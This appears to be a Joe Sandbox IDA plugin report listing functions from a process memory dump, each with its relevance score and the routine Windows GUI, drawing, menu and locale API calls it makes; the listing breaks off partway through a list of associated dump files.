Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004470F8, Relevance: 7.7, APIs: 5, Instructions: 162

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 004471C7
OffsetRect.USER32(?,00000001,00000001), ref: 00447218
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044724D
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044725A

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004472C1

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0042A40C, Relevance: 7.6, APIs: 5, Instructions: 110

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0042A4A6
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A4DE
OffsetRect.USER32(?,000000FF,000000FF), ref: 0042A4E8
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A520
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A547

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043B3DC, Relevance: 7.6, APIs: 5, Instructions: 104

APIs

BeginPaint.USER32(00000000,?), ref: 0043B402
SaveDC.GDI32(?), ref: 0043B436
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043B498
RestoreDC.GDI32(?,?), ref: 0043B4C2

Part of subcall function 0043B538: RectVisible.GDI32(?,?), ref: 0043B5F1
Part of subcall function 0043B538: SaveDC.GDI32(?), ref: 0043B607
Part of subcall function 0043B538: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B62A
Part of subcall function 0043B538: RestoreDC.GDI32(?,?), ref: 0043B645
Part of subcall function 0043B538: CreateSolidBrush.GDI32(00000000), ref: 0043B6C6
Part of subcall function 0043B538: FrameRect.USER32(?,?,?), ref: 0043B6F9
Part of subcall function 0043B538: DeleteObject.GDI32(?), ref: 0043B703
Part of subcall function 0043B538: CreateSolidBrush.GDI32(00000000), ref: 0043B713
Part of subcall function 0043B538: FrameRect.USER32(?,00000000,?), ref: 0043B746
Part of subcall function 0043B538: DeleteObject.GDI32(?), ref: 0043B750

EndPaint.USER32(00000000,?), ref: 0043B4F6

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004593E0, Relevance: 7.6, APIs: 5, Instructions: 86

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 00459416
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0045944A
OffsetRect.USER32(?,000000FF,000000FF), ref: 00459457
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00459489
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004594B0

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00446F38, Relevance: 7.6, APIs: 5, Instructions: 77

APIs

Part of subcall function 00447068: CreatePopupMenu.USER32(?,00446D7B,00000000,00000000,00446DBF), ref: 00447083
Part of subcall function 00447068: CreateMenu.USER32 ref: 0044708D

GetMenuItemCount.USER32(00000000), ref: 00446F70
GetMenuState.USER32(00000000,-00000001,00000400), ref: 00446F91
RemoveMenu.USER32(00000000,-00000001,00000400), ref: 00446FA8
GetMenuItemCount.USER32(00000000), ref: 00446FD8
DestroyMenu.USER32(00000000), ref: 00446FE5

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00456928, Relevance: 7.6, APIs: 5, Instructions: 73

APIs

GetCapture.USER32(?,?,0045BD1C,00000001,00456AEB,?,?,?,0045BD1C), ref: 0045694B
GetParent.USER32(00000000), ref: 00456971

Part of subcall function 00433EA4: GlobalFindAtomA.KERNEL32(00000000), ref: 00433EB8
Part of subcall function 00433EA4: GetPropA.USER32(00000000,00000000), ref: 00433ECF

SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 0045699F
GetWindowLongA.USER32(00000000,000000FA), ref: 004569AF
SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 004569CE

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00424420, Relevance: 7.6, APIs: 5, Instructions: 66

APIs

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

GetDC.USER32(00000000), ref: 00424476
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
CreateHalftonePalette.GDI32(00000000), ref: 004244B9
ReleaseDC.USER32(00000000,00000000), ref: 004244C4

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00454084, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 004540B8
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004540EA
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000), ref: 00454124
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 0045413D
RedrawWindow.USER32(00000000,00000000,00000000,00000485), ref: 00454153

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0041C8EC, Relevance: 7.6, APIs: 5, Instructions: 60

APIs

GetClassInfoA.USER32(00400000,0041C8DC,?), ref: 0041C90D
UnregisterClassA.USER32(0041C8DC,00400000), ref: 0041C936
RegisterClassA.USER32(0045C4C0), ref: 0041C940
CreateWindowExA.USER32(00000080,0041C8DC,0041C99C,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0041C96E

Part of subcall function 0041C830: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041C98B

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00420498, Relevance: 7.6, APIs: 5, Instructions: 55

APIs

GetDC.USER32(00000000), ref: 004204B0
GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
GetPaletteEntries.GDI32(02080848,00000000,00000008,?), ref: 004204E4
GetPaletteEntries.GDI32(02080848,00000008,00000008,?), ref: 004204FC
ReleaseDC.USER32(00000000,?), ref: 00420518

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004099F4, Relevance: 7.6, APIs: 5, Instructions: 50

APIs

GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A8B,?,?,00000000), ref: 00409A65
EnumCalendarInfoA.KERNEL32(Function_0000997C,00000000,00000000,00000003), ref: 00409A70

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00455684, Relevance: 7.5, APIs: 5, Instructions: 25

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00455693
SetEvent.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556AE
GetCurrentThreadId.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556B3
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004556C8
CloseHandle.KERNEL32(00000000), ref: 004556D3

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0044197C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287

APIs

Part of subcall function 00441460: SelectObject.GDI32(?,00000000), ref: 0044150C
Part of subcall function 00441460: PatBlt.GDI32(?,?,?,?,?,005A0049,?,00000000), ref: 00441534
Part of subcall function 00441460: SelectObject.GDI32(?,00000000), ref: 0044153E

Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00437CE1
Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00437DE3
Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000001), ref: 00437E1F

PeekMessageA.USER32(?,00000000,00000203,00000203,00000000), ref: 00441AF8

Part of subcall function 0043762C: GetCursorPos.USER32 ref: 00437690

Part of subcall function 0044134C: GetDCEx.USER32(00000000,00000000,00000412), ref: 00441387

Part of subcall function 004413AC: ReleaseDC.USER32(?,?), ref: 004413CA

GetCursorPos.USER32(?), ref: 00441BBC
SetCursor.USER32(00000000), ref: 00441C4E

Strings

41C, xrefs: 00441B04

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00425130, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203

APIs

Part of subcall function 0042429C: GetObjectA.GDI32(?,00000054,?), ref: 004242C2

SelectObject.GDI32(?,?), ref: 0042522C
GetDIBColorTable.GDI32(?,00000000,00000100,?), ref: 0042524D
SelectObject.GDI32(?,?), ref: 00425262

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042060E

Strings

BM, xrefs: 00425208

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00409AA4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148

APIs

GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Strings

yyyy, xrefs: 00409BC5
eeee, xrefs: 00409BDE
ggg, xrefs: 00409BB8

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004352E0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144

APIs

GetWindowRect.USER32(00000000,-00000044), ref: 004353CC
GetCursorPos.USER32(?), ref: 004353F7

Part of subcall function 00435170: GetCursorPos.USER32(00464B90), ref: 00435191
Part of subcall function 00435170: GetCursor.USER32 ref: 004351AD
Part of subcall function 00435170: GetDesktopWindow.USER32 ref: 0043529F

Strings

41C, xrefs: 004353AE, 004353E4
8 C, xrefs: 00435392

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043D284, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83

APIs

IsWindowVisible.USER32(?), ref: 0043D29F
ScrollWindow.USER32(?,?,?,00000000,00000000), ref: 0043D2CE
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043D344

Strings

41C, xrefs: 0043D2F1

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004573BC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80

APIs

Part of subcall function 00457338: GetCursorPos.USER32 ref: 00457341

GetCurrentThreadId.KERNEL32(00000000,004574CA,?,?,?,0045BD1C), ref: 00457488
WaitMessage.USER32 ref: 004574AA

Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
Part of subcall function 0041B680: RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
Part of subcall function 0041B680: SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
Part of subcall function 0041B680: RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Part of subcall function 004572D4: IsWindowVisible.USER32(00000000), ref: 0045730C
Part of subcall function 004572D4: IsWindowEnabled.USER32(00000000), ref: 0045731D

Strings

0@F, xrefs: 0045748D
4kE, xrefs: 004573DE, 004573E8, 00457439, 00457461, 00457449, 0045744C, 004573F4, 004573FD

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0044A214, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044A262
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044A2B4
DrawMenuBar.USER32(00000000), ref: 0044A2C1

Strings

P, xrefs: 0044A254

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00426624, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44

APIs

GetSystemMetrics.USER32(00000000), ref: 00426672
GetSystemMetrics.USER32(00000001), ref: 00426684

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromPoint, xrefs: 00426636
$fB, xrefs: 0042663B, 00426648, 00426654

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0040B134, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040BE0D,00000000,0040BE20), ref: 0040B13A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040BE0D,00000000,0040BE20), ref: 0040B14B

Strings

GetDiskFreeSpaceExA, xrefs: 0040B145
kernel32.dll, xrefs: 0040B135

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00434EA0, Relevance: 6.2, APIs: 4, Instructions: 204

APIs

GetDesktopWindow.USER32 ref: 00434F14
GetDesktopWindow.USER32 ref: 00435039

Part of subcall function 0043F03C: ShowCursor.USER32(00000000), ref: 0043F08D

Part of subcall function 0043F124: 6D3D5F83.COMCTL32(?,?), ref: 0043F152

Part of subcall function 0043F198: 6D3D5F17.COMCTL32(00000000,?,00435069), ref: 0043F1B4
Part of subcall function 0043F198: ShowCursor.USER32(000000FF), ref: 0043F1CF

SetCursor.USER32(00000000), ref: 00435079
SetCursor.USER32(00000000), ref: 0043508E

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004511BC, Relevance: 6.1, APIs: 4, Instructions: 148

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetMenu.USER32(00000000), ref: 004512E0
SetMenu.USER32(00000000,00000000), ref: 004512FD
SetMenu.USER32(00000000,00000000), ref: 00451332
SetMenu.USER32(00000000,00000000), ref: 0045134E

Part of subcall function 004510F4: GetMenu.USER32(00000000), ref: 0045113A
Part of subcall function 004510F4: SendMessageA.USER32(00000000,00000230,00000000,00000000), ref: 00451152
Part of subcall function 004510F4: DrawMenuBar.USER32(00000000), ref: 00451163

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00454694, Relevance: 6.1, APIs: 4, Instructions: 99

APIs

Part of subcall function 00454A50: LoadCursorA.USER32(00000000,00007F00), ref: 00454A5D
Part of subcall function 00454A50: LoadCursorA.USER32(00000000,00000000), ref: 00454A8C

GetKeyboardLayout.USER32(00000000), ref: 004546D9
GetDC.USER32(00000000), ref: 0045472E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00454738
ReleaseDC.USER32(00000000,00000000), ref: 00454743

Part of subcall function 00454E70: SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454EC4
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454ED1
Part of subcall function 00454E70: GetStockObject.GDI32(0000000D), ref: 00454EE7
Part of subcall function 00454E70: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454F10
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454F20
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454F39
Part of subcall function 00454E70: GetStockObject.GDI32(0000000D), ref: 00454F5F

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
